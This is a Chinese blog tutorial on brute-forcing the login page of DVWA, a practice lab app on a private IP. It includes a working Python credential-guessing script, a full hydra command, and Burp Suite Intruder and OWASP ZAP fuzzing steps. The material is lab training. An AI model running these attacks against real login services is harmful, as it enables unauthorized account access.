DVWA-多个工具及python代码实现暴力破解登录

最新推荐文章于 2024-09-13 00:14:13 发布
最新推荐文章于 2024-09-13 00:14:13 发布
阅读量2.3k 收藏 9
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/96436752
版权

 

前言现在那个DVWA里的Brute Force都已经烂大街了,那么今天我们就来演示一下如何从登录页面暴力破解进去

0x01.python代码:

1.在浏览器找到dvwa登录页面

 2.我们尝试提交数据:

发现点击登录之后url上依然是login.php,并且出现login failed 提示

由此我们确定此页面的http请求方式为post

3.打开Burpsuite并挂上代理,重新输入参数并提交请求

 发现确实是POST方法并且还发现了参数传输格式是明文传输,由此我们直接构造简单代码 实现暴力破解。

import requests


def brute_force(username, password):
    url = "http://192.168.255.128/dvwa/login.php"
    parm = {"username": username,
            "password": password,
            "Login": "Login"
            }
    r = requests.post(url, data=parm)
    if r.url == "http://192.168.255.128/dvwa/login.php":
        print("破解失败username is %s , password is %s" % (username, password))
    else:
        print('破解成功 username is %s , password is %s' % (username, password))
        exit()


def open_dic():
    with open("username.txt") as Duser:
        for Users in Duser.readlines():
            with open("password.txt") as Dpass:
                for Passes in Dpass.readlines():
                    brute_force(Users.strip(), Passes.strip())


open_dic()

0x02.burpsuite暴力破解:

1.还是burpsuite抓包

2. CTRL+i发送到Intruder

3.设置参数变量 先clear清空 然后选中字段add 其中Attack type选为Cluster bomb 混合破解

 4.点击payload 设置payload set 选择1即选择参数1,然后点击load加载参数1的字典,再在payload set中选择2即选择参数2,然后也点击load加载参数2的字典。

 

5.点击option可以设置线程、过滤等参数。

6.点击intruder 并选择start attack

 

 7.成功找到正确账号密码。

0x03.hydra 暴力破解DVWA登录页面

1.使用hydra直接输入以下命令进行暴力破解:

hydra -L username.txt -P password.txt 192.168.255.128 -t 3 -o ok.txt http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -vV -f


2.解释命令:

-L 加载用户名字典

-P 加载密码字典

-t 设置线程为3

-o 结果输出到文件ok.txt

http-post-form是指的post请求方法

" "里其中/dvwa/login.php是暴力破解的页面,username是用户名的input标签里的name属性的名字,password是密码的input标签里的name属性的名字,^USER^ ^PASS^ 是变量,Login failed是失败了页面显示的内容

-vV 显示具体过程

-f 破解出来停止

0x04.Owaspzap暴力破解Dvwa登录页面

1.Owaspzap自动扫描 会自己测试一下 方便做fuzzing

2.输入域名,点击攻击

 3.点开站点,找到右上角请求,点击请求

4.选中要fuzzing的参数,右键fuzzing 

5. 话不都说,看图

6.其他参数同理

7.添加配置参数完毕之后点击start fuzzing

8.在响应里找到和Location:login.php 跳转的不同页面,一般是最后一行

 9.自己可以设置代理进行捕捉参数

10. 设置代理,最好和burpsuite的127.0.0.1:8080区分开来,我设置的是8081 浏览器一样 不用

 11.在浏览器中输入响应参数

12.查看,然后接下来步骤和上面一样 

0x05.结语

这些工具 都是我认为很好用的,有时间会对每个工具专门出一篇博客。谢谢大家! 

nex1less
关注
DVWA系列之Brute Force(暴力破解)源码分析及漏洞利用
7Riven's blog
11-26 2066
Brute Force Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。字典本生成:http://tools.mayter.cn/ 目录 low级别源码分析 medium级别源码分析 high级别源码分析​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​...
Pythondvwa进行密码爆破
HYN20070813的博客
08-02 518
在CSDN上找了不少关于Pythondvwa密码爆破的文章,结果一个都不能用…… 于是用一晚上写了这个dvwa密码暴破程序 废话不多说,上代码: import time from selenium import webdriver import sys driver = webdriver.Firefox(executable_path=r'D:\Program Files\geckodriver.exe') #改为你的geckodriver位置 driver.get("http://127.0
暴力破解代码
09-11
如果你下了,你不会后悔的,该代码还是有一定的逻辑结构值得你我分享的。
学习Python渗透第十二天:用Python实现暴力破解
2203_75839317的博客
03-25 1311
接下来,我们来编写一个可以实现登录功能的Python程序,这里需要用到requests库,这是一个专门用来处理HTTP的库,利用这个库发起请求十分简单,例如我们需要发送POST请求,需要用到requests.post()函数,这个函数比较复杂,常用格式如下。
DVWA】——Brute Force(暴力破解
最新发布
HinsCoder的博客
09-13 1329
准备好Brup Suite软件。
动网论坛password暴力破解程序代码
weixin_34208185的博客
07-31 159
<%  response.buffer=false  '为防止程序陷入死循环,初始化一些最大重试值  Dim MaxPassLen,MaxPassAsc  MaxPassLen=20 'password最大长度  MaxPassAsc=20 '==== 字符转换  Function bytes2BSTR(vIn)  strReturn = ""  For j =...
DVWA系列】一、Brute Force 暴力破解(源码分析&python脚本实现
Pluto.的博客
03-09 1741
文章目录DVWABrute Force 暴力破解一、low级别二、medium级别三、high级别 DVWA Brute Force 暴力破解 一、low级别 无任何安全防护措施 爆破方法:bp抓包 —> 发送到Intruder模块 —> 定义变量 —> 导入密码字典 —> 开始爆破 根据长度可得密码: 源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // 获取用户名 $user = $_GET[ 'username'
python专场——暴力破解DVWA
m0_52923241的博客
08-27 3184
暴力破解python编写针对登陆的暴力破解程序工作原理暴力破解的三种思路生成字典文件DVWA登陆的暴力破解程序Brute Force(暴力破解) 用python编写针对登陆的暴力破解程序 工作原理 首先这是一种针对用户名密码登陆的情况,用户输入用户名密码,只要与服务器保存的信息相一致就可以获得对应的权限。 暴力破解的三种思路 通常用户名不会作为隐私,当获得用户名之后就可以使用暴力破解的方法(暴力破解即逐个尝试) 纯字典攻击:需要合适的字典文件;利用攻击工具用户名和字典文件中的密码组合起来,依次尝试
DVWA-BruteFoce高级安全
R4bbit
06-24 278
DVWA:security=high GET包结构 比起来之前low,medium等级,可以看到这里多了一个参数,user_token,为了防止暴力破解加了一个token的验证,这种应该属于多重验证,但是明显能看出来user_token就是用户输入密码的md5形式,直接用burpsutie中Payload Processing处理下就OK了 如果不知道token是用的什么加密算法,就从前端中去寻找,这里发现了一个hidden的隐藏域 ...
DVWA靶场Brute Force暴力破解练习
c_programj的博客
07-16 650
#DVWA靶场练习—— Brute Force暴力破解 暴力破解:通过穷举法列举出所有可能的结果,然后一个一个验证是否满足条件。 【Low】 使用burpsuite代理抓包,将抓取到的数据包发送到Intruder,或者使用快捷键ctrl+i,然后对参数行进设置。 Positions设置: Payloads设置: 开始进行攻击: 长度与众不同的就是爆破出来的密码。 后台码源: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username
DVWA暴力破解(Brute_Force High级别)
liweibin812的博客
01-11 1万+
DVWA调至high级别,发现用之前的暴力破解就不好使了,因为其使用了随机token机制来防止CSRF,从而在一定程度上防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1. 将登录请求进行拦截,发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻...
php暴力破解代码
04-21
php暴力破解代码
暴力破解密码代码
12-24
暴力破解密码的程序,学习如何操作其他窗口,尤其是那些忘记密码的。
暴力破解的程序源代码
10-30
关于暴力破解的一个源代码,希望帮助有需要的人,感觉还不错
语言源代码密码暴力破解
08-17
语言源代码密码暴力破解
python暴力破解代码
热门推荐
10-16 11万+
MySQL 数据库暴力破解代码 ··· -- coding: utf-8 -- import pymysql success = False f_user = open(‘username.txt’, ‘r’) f_pwd = open(‘password.txt’, ‘r’) lines_user = f_user.readlines() #读取出来是一个列表 lines_pwd = f_pw...
暴力破解算法,基本实现
weixin_30839881的博客
09-23 269
using System; using System.Collections.Generic; using System.Text; namespace 暴力算法 { class Program { static void Main(string[] args) { int maxLength = 5; //设置可...
dvwa - brute force - middle -python-python3模拟使用本地密码库进行暴力破解dvwa中级难度的密码
qq284489030的博客
12-12 326
时隔一年后看这个标题,自己也有点懵逼。 加点说明吧。 dvwa是渗透测试靶机系统,好像有10钟类型漏洞; 现在用python模拟使用本地密码库进行暴力破解中级难度的密码密码文件psw.txt跟python文件同级目录下,内容: 111 222 password 444 5555555555555555 test.py内容如下: import requests import...
暴力破解
qq_45961314的博客
01-31 311
/* 今年是2021年啦!这是一个很特殊的年哦(特殊个屁), 因为它每一位数加起来正好是5(2+0+2+1), 现在请问从公元1年到2021年 一共有几个正好每一位数加起来为5的年份呢? 并把对应的年份求出来吧! */ #include <bits/stdc++.h> using namespace std; int main(){ ios::sync_with_stdio(0); for(int i = 0; i <=9 ; i++){ for(int j = 0; j &lt
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值